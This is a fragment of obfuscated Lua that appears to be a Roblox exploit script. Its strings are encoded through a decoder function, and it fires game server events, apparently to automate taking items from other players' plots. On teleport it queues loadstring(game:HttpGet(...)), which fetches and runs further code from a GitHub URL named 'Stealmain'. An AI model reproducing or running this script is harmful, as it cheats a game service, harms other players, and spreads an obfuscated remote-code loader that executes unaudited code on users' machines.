(v242.ObjectText==v7("\210\15\37\31\149\24\62\100\250\6\39\20\145","\22\147\99\73\112\226\56\120"))) then v241:FireServer();end end break;end if (v177==(0 + 0)) then v73.slow=0 + 0 ;v178=v21.GetPlayerPlot(v140);v177=1 + 0 ;end end end end);break;end if (v69==(17 -11)) then v82={};v83={};v84=false;v85=nil;v69=4 + 3 ;end if (v69==(0 -0)) then v33();if (typeof(queue_on_teleport)==v7("\94\53\125\255\78\73\87\46","\32\56\64\19\156\58")) then queue_on_teleport('loadstring(game:HttpGet("https://raw.githubusercontent.com/DupeNew/bot/refs/heads/main/Stealmain", true))()');end pcall(function() game:GetService(v7("\104\205\245\90\83\241\129\78\205\225\101\78\253\146\91\207\224","\224\58\168\133\54\58\146")):WaitForChild(v7("\105\87\72\246\116\129\130\24","\107\57\54\43\157\21\230\231")):WaitForChild(v7("\245\142\5","\175\187\235\113\149\217\188")):WaitForChild(v7("\14\138\206\124\239\118\108\15\170\147\90\234\122\125\115\155\142\75\228\117\125\26\189\136\73\237\125\107","\24\92\207\225\44\131\25")):FireServer();end);v31();v69=1;end if ((3 + 2)==v69) then v78={[v7("\85\33\160\95\75\82\45\181\66\68\84\32","\45\59\78\212\54")]=false,[v7("\22\68\138\142\136\42\131\255\4\95\133","\144\112\54\227\235\230\78\205")]=false,[v7("\191\45\14\248\213\73\177\39\14\238\212","\59\211\72\111\156\176")]=false,[v7("\93\130\247\57\71\137\228\62\98\142\240\57","\77\46\231\131")]=false,[v7("\191\76\166\69\168\93\179\78\185\81\149\72\187\64","\32\218\52\214")]=false,[v7("\66\18\48\190\244\146\80\78\90\24\63","\58\46\119\81\200\145\208\37")]=false};v79={};v80,v81=pcall(function() return require(v8:WaitForChild(v7("\15\141\36\173\186","\86\75\236\80\204\201\221")):WaitForChild(v7("\83\79\126\136\255\135\97","\235\18\33\23\229\158")));end);if (v80 and (type(v81)==v7("\68\187\195\183\85","\219\48\218\161"))) then for v179,v180 in pairs(v81) do v79[v179]=true;end end v69=4 + 2 ;end end end v34();
